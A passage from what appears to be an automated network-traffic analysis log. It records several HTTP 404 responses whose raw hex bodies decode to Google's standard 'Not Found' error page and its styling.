6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
